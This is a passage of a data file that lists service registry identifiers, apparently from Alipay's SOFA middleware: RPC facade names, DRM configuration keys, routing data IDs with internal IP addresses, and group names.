anage.gildata.QsDailyQuoteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.temp.DataProcessTempQueryService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshycommander.common.service.facade.MeshySearchEngineService:1.0:meshySearchEngineService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.YuemaPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.industry.api.IndustryActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsReserveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_RISK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecquery.common.service.credit.CreditAuthzQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExStandardProductRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finfundprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fpdecision.facade.RiskmngDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.capability.payments.PayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-amldata-retry#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:clearDeductApplyLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.SceneProjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.uqc.facade.UserQualificationControlServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.117.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.midas.service.facade.api.LoadtestQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfcc.common.service.facade.callback.NfccCallbackFacade:1.0:cloudnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.directory.DirectoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.task.AssetSearchService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.maintenance.MaintenanceProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.ResourceRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_MOBILEACAUTH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crmhome.common.service.facade.api.proposal.MobileClientProposalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:huabeiComponentSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.impl.ExpressDrmTrigger.userIdCheckSceneStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.facade.FinfoServiceFinfoApiCtrlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityCopyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revol.core.service.facade.ScriptChecker:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:etetestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tuition.tr.TuitionWFMannalHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.openapi.merchant.StoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_redeem_daemon.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csassistant.service.facade.api.AssistantHuashuService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.batchTimeThreadSleep,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auditprod.common.service.facade.riskmanage.RiskPointSyncFacade:1.0:auditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.common.api.TempFileDownloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseamerchant.api.OSMerchanttransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bkmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.couponAlipassIdWithoutActiveUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instservice.common.service.facade.instserviceconfig.IscConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmClientMonitorSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_DMS_SHARED#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.core.service.yeb.repository.AdvanceAccountInfoRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.auto.MdataQueryL1Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.CategoryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.mobileDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpromocore.common.service.backendfacade.api.CampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:interstellardevelop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.openid.OpenIdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opencore2:name=com.alipay.opencommon.broadcaster.common.drm.BroadcasterDRMConfig.commonConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_selfhelpMaintain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:unitradeprod.product.FaceToFace@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.gplus.GplusRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.newsBufferNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_INST_CB_MSG_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListCreateSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.investtrade.facade.api.security.SecurityDealStockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IOPENGW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gateway.adapterservice.MobileAdapterService:1.0:mobile-global-saas-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.FlowTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MYPOINTSCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_RCACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isSysAutoload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfsettle.common.service.integration.acep.AcepClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.TagManagementUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.impl.support.drm.LpAdminDrm.blacklistUserIdArNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:morderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.starWishRecommendRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprobe.common.service.facade.api.IprobeUtilService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.RoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.randomSectionCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.product.VcpVoucherProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antinvest.api.facade.HsInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:cloudinc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.underwrite.UnderwriteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.profile.admin.ProfileAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.KeywordsConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.photocopy.PhotoCopyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_adjustArProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.65.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.manage.facade.api.PrizeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcif.common.service.facade.api.merchant.AlipayMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.open.product.ProductLineMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mypointsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.config.ClusterConfig.systemIndex,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ipsponsorprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","custcpt@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.mychain.baas.common.user.service.FeatureApplicationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.SecondLevelCounterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.composeimg.ComposeImgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SubjectContentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwdswp.common.service.facade.risk.RiskScanTempService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:businessProcessPublishProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.secretary.WorkAssistantTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-32#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recon.common.service.query.chart.api.ChartQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.hf.service.HfTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antgraph.facade.GeaBaseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.icbcenter.service.facade.api.ChargebackJudgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.FlowTaskIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.label.LabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:oss-test-server@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableAntq,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cooperservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0:antbuservice-global@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-alittlepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.islandCheckIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_MASTERDATA_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.omp.common.service.facade.api.ActivityBudgetTmpChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.dandan.facade.EmergencyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:ordermng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.tradeexprod.tradeexport_config_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.biz.input.localtask.LocalTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.XgbFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.TaskExecutorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.fullscene.GetChargeInfoFromCaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_REFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.meshynotify.common.service.facade.api.AppNotifyServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.fici.FICIPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.spacePatternText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.FortuneMenuFacade:1.0:instopen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promoplatform_DeliverTaskDelayProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.huntshadow.HsAreaGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:${echox_app_name}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_FINBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ipsponsorprod.biz.shared.message.MessageNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.closeMobileBindingEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.module.merchant.facade.api.WorkflowRetryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcconsultcore.common.service.facade.api.RcGeneralConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.api.LiveAnchorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.extension.WorkbenchEffluxService:1.0:contentfactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.CommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.StatusbarTodoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.common.service.facade.api.dynamicview.ActionRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SystemParameterQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.MonitorApiService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.resultwrap:name=com.alipay.chair.businessgray.drm.renderGray.renderGrayAccountLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:sdaappdist@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.arrangement.LoanARQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.YqDocumentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilemock.common.service.facade.api.RpcServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.api.internal.tmc.MessageHandler:1.0:grmcore_program_purchase_on_create_pr_message@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.UnifiledAccountViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:multiend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.deposit.api.DepositDOQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.discount.RtCampLabelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.rule.transfer.TransferRuleManager:1.0:transferRuleManagerImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacube.common.service.facade.facade.TyInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","BuildpackOSInternalRest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:hook4vulns@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.PromoDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antgraphconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.generalInvoice.QueryApplyInvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SystemParameterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.SandboxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.GroupChatWelcomeMsgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.auth.AuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointFlowinService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.ExecutionQueryFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.InformationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserBlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdAppConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.101.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insserviceprod.facade.InsSerPortalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanweb.facade.BkloanwebProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:insleads@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.intl.translate.service.GeneralTranslateService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finslipTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.cluster.facade.ClusterTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.FinancialCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.CustActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.commodities.event.CommoditiesAccorderEventHandlerTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.MerchantOssToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.cicada.LifeActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.TaskManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoConsultFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ceresmeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.DeductBizActionCallBack:1.0:ccrprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.recruit.query.RecruitCrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.archdomain.AppArchDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.ReverseGeoCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshysale@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.27.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_I